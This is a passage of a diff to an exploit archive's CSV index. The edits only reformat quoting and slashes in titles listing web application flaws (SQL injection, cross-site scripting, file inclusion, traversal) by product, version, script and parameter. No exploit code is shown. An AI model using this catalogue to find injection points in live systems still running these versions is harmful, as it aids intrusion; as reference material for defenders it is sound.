+28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 +28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - '/admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - '/admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - 'Headeruserdata.php' SQL Injection",2006-08-30,DarkFig,php,webapps,0 +28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - 'Loginreq2.php' Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions",2006-08-31,Matdhule,php,webapps,0 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusions",2006-09-01,MATASANOS,php,webapps,0 @@ -30519,16 +30520,16 @@ id,file,description,date,author,platform,type,port 28460,platforms/php/webapps/28460.txt,"EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28461,platforms/php/webapps/28461.txt,"EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28462,platforms/php/webapps/28462.txt,"EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 - profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 +28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 - 'profile.php' Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 -28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 - Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 +28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 - 'Aut_Verifica.Inc.php' SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 28485,platforms/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,php,webapps,0 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 -28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - Joueurs.php SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 +28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0 28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0 @@ -30551,27 +30552,27 @@ id,file,description,date,author,platform,type,port 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - 'includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - 'help/en/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - 'help/de/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/preview.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/log.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/config.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - 'admin/admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 - Haut.php Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 -28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 - Ratings.php Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 +28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 - 'Haut.php' Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 +28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 - 'Ratings.php' Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 28545,platforms/php/webapps/28545.txt,"e107 website system 0.7.5 - 'contact.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 28546,platforms/php/webapps/28546.txt,"e107 website system 0.7.5 - 'download.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 28547,platforms/php/webapps/28547.txt,"e107 website system 0.7.5 - 'admin.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps,0 @@ -30598,18 +30599,18 @@ id,file,description,date,author,platform,type,port 28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 - links.php HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 -28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - 'admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 -28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - 'admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 +28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - '/admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 +28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - '/admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php?Username' SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusions",2006-09-14,"Saudi Hackrz",php,webapps,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 -28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 -28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 -28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 -28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - 'modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 +28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple SQL Injections",2006-09-15,"HACKERS PAL",php,webapps,0 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 - Default.aspx SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - members.asp Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 @@ -30620,11 +30621,11 @@ id,file,description,date,author,platform,type,port 28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 - 'index.php' Remote File Inclusion",2006-09-16,botan,php,webapps,0 28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - search.asp SQL Injection",2006-09-18,ajann,asp,webapps,0 28598,platforms/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,php,webapps,0 -28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 - lostpassword.php Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps,0 +28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 - 'lostpassword.php' Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps,0 28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 - Search_Run.asp SQL Injection",2006-09-18,ajann,asp,webapps,0 28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 - 'search.php' Cross-Site Scripting",2006-09-18,Snake,php,webapps,0 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 -28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 +28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - 'search.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 @@ -30632,11 +30633,11 @@ id,file,description,date,author,platform,type,port 28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - 'admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - 'admin/index.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 -28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 - Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 +28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 - 'Choix_langue.php' Directory Traversal",2006-09-20,cdg393,php,webapps,0 28617,platforms/php/webapps/28617.txt,"BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28618,platforms/php/webapps/28618.txt,"BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28619,platforms/php/webapps/28619.txt,"BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -30660,21 +30661,21 @@ id,file,description,date,author,platform,type,port 28637,platforms/php/webapps/28637.txt,"BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28638,platforms/php/webapps/28638.txt,"BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 -28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 +28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 -28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - FileManager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 +28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - 'FileManager.php' Directory Traversal",2006-09-22,GuanYu,php,webapps,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 -28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - 'admin/forgot_pass.php?user_name' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - '/admin/forgot_pass.php?user_name' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0 28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - 'view_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - 'view_doc.php?view_doc' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - 'admin/print_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 -28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 +28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - 'Media.php' Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 28662,platforms/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28663,platforms/php/webapps/28663.txt,"Photostore - 'view_photog.php?photogid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 @@ -30686,19 +30687,19 @@ id,file,description,date,author,platform,type,port 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - 'admin/index.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - '/admin/index.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - 'Facts.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - 'search.php?includes_path' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28687,platforms/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - 'admin/news.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - 'admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - '/admin/news.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - '/admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28690,platforms/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,Root3r_H3ll,php,webapps,0 -28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - 'modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 +28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - '/modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps,0 28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php?image' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,"HACKERS PAL",php,webapps,0 @@ -30715,11 +30716,11 @@ id,file,description,date,author,platform,type,port 28728,platforms/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 -28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 +28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - 'home.php' Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - 'index.php3' Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site 